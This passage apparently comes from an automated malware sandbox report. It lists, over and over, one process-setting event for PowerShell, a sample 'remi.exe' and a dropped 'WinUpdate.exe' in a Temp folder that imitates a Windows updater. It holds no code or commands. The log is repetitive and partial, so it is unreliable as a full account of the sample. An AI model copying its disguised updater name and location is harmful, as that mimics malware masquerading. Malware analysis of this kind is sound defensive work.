                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
